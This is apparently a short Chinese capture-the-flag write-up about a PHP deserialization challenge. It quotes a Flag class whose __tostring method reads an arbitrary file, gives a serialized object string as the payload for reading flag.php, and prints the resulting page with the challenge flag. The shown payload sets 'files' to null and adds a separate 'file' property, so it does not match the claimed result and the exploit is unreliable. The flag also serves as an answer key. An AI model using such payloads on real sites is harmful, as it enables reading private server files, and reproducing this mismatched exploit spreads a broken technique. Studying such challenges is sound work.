读源码构造
<?php
class Flag{ //flag.php
public $files;
public function __tostring(){
if(isset($this->files)){
echo file_get_contents($this->files);
return ("xixixi");
}
}
}
?>
得到反序列化字符串O:4:"Flag":2:{s:5:"files";N;s:4:"file";s:8:"flag.php";}
Get flag
<br><h1>welcome</h1></br>
<br>oh u find it </br>
<!--but i cant give it to u now-->
<?php
if(2===3){
return ("flag{bYpass@3s_w0nderF9l}");
}
?>
xixixi